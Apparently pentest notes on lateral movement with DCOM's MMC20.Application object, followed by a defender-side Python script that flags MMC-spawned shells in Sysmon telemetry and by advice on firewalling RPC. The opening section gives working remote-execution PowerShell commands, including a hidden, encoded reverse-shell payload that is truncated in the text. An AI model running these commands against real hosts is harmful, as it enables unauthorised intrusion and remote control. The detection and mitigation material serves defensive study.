DCOM

This attack requires local administrator rights on both the source host and the target.

This technique leverages DCOM through the Microsoft Management Console (MMC) application object, MMC20.Application.

DCOM (Distributed Component Object Model) is Microsoft's API for communication between software components across the network.

In a PowerShell session, first create the MMC instance on the remote target (192.168.50.73 here):

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))

Then we can start the calculator on the target:

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Or spawn a reverse shell via an encoded PowerShell command:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")
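As an added defender-side example (not part of the original notes), the Python script below shows what this technique looks like in endpoint telemetry and how to flag it. The DCOM launcher starts MMC on the target as `mmc.exe -Embedding`, and ExecuteShellCommand then makes that MMC process the parent of cmd.exe or powershell.exe, a parent/child pairing an interactive MMC session rarely produces. The script assumes Sysmon process-creation (Event ID 1) records and Security 4624 logon records already parsed into dicts using Sysmon's and the Security log's field names; every sample event, the account CORP\admin and the source address 192.168.50.10 are constructed.

```python
"""Flag MMC20.Application DCOM lateral movement in Sysmon-style process events.

Added example, not code from the original page. Assumes events are dicts
with Sysmon Event ID 1 field names (UtcTime, Image, CommandLine, ParentImage,
ParentCommandLine, User) and Security 4624 field names (TimeCreated,
TargetUserName, LogonType, IpAddress). All sample data below is constructed.
"""
from datetime import datetime, timedelta
from typing import Iterable, Optional

SYSMON_TIME = "%Y-%m-%d %H:%M:%S.%f"

# Children that ExecuteShellCommand is typically used to launch.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe",
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(value: str) -> datetime:
    return datetime.strptime(value, SYSMON_TIME)


def is_dcom_mmc_spawn(ev: dict) -> bool:
    """True when a shell/script host is spawned by a DCOM-activated MMC.

    The DCOM launcher runs MMC as `mmc.exe -Embedding`; an interactive MMC
    session is started with a .msc path instead, so the flag is the tell.
    """
    if _basename(ev.get("ParentImage", "")) != "mmc.exe":
        return False
    if "-embedding" not in ev.get("ParentCommandLine", "").lower():
        return False
    return _basename(ev.get("Image", "")) in SUSPICIOUS_CHILDREN


def find_dcom_mmc_spawns(events: Iterable[dict]) -> list:
    return [ev for ev in events if is_dcom_mmc_spawn(ev)]


def source_of_spawn(spawn: dict, logons: Iterable[dict],
                    window: timedelta = timedelta(seconds=120)) -> Optional[str]:
    """IpAddress of the latest network logon (4624, LogonType 3) by the
    spawning account within `window` before the spawn, or None."""
    user = spawn.get("User", "").split("\\")[-1].lower()
    t_spawn = _ts(spawn["UtcTime"])
    best = None
    for lg in logons:
        if lg.get("EventID") != 4624 or lg.get("LogonType") != "3":
            continue
        if lg.get("TargetUserName", "").lower() != user:
            continue
        t = _ts(lg["TimeCreated"])
        if t <= t_spawn <= t + window:
            if best is None or t > _ts(best["TimeCreated"]):
                best = lg
    return best["IpAddress"] if best else None


def report(events: Iterable[dict], logons: Iterable[dict]) -> list:
    """One finding per suspicious spawn, enriched with the likely source host."""
    logons = list(logons)
    return [{
        "time": ev["UtcTime"],
        "user": ev.get("User", ""),
        "child": _basename(ev["Image"]),
        "cmdline": ev.get("CommandLine", ""),
        "source_ip": source_of_spawn(ev, logons),
    } for ev in find_dcom_mmc_spawns(events)]


# Constructed sample telemetry from the target host.
SAMPLE_EVENTS = [
    {  # DCOM-activated MMC launching cmd: the pattern this page describes
        "UtcTime": "2024-01-01 10:00:05.000", "User": r"CORP\admin",
        "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c calc",
        "ParentImage": r"C:\Windows\System32\mmc.exe",
        "ParentCommandLine": r'"C:\Windows\system32\mmc.exe" -Embedding',
    },
    {  # benign: user opens cmd from Explorer
        "UtcTime": "2024-01-01 10:05:00.000", "User": r"CORP\alice",
        "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
    },
    {  # benign: interactive MMC (services.msc) spawning powershell
        "UtcTime": "2024-01-01 10:06:00.000", "User": r"CORP\alice",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
        "ParentImage": r"C:\Windows\System32\mmc.exe",
        "ParentCommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"',
    },
]
SAMPLE_LOGONS = [
    {"EventID": 4624, "TimeCreated": "2024-01-01 10:00:01.000",
     "TargetUserName": "admin", "LogonType": "3", "IpAddress": "192.168.50.10"},
]

if __name__ == "__main__":
    for finding in report(SAMPLE_EVENTS, SAMPLE_LOGONS):
        print(finding)
```

Run on the constructed sample it reports exactly one finding, cmd.exe under the embedded MMC for CORP\admin, attributed to 192.168.50.10 by the network logon four seconds earlier; the Explorer-launched cmd and the interactive services.msc session are not flagged. On a real host the same logic can be fed from the Sysmon operational and Security event logs. Beyond detection, the attack also needs the target's RPC endpoint mapper (TCP 135) and dynamic RPC ports reachable from the source, plus admin rights on the target, so host firewall rules that restrict DCOM/RPC to management hosts and policies that deny network logon to local administrator accounts narrow the exposure.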
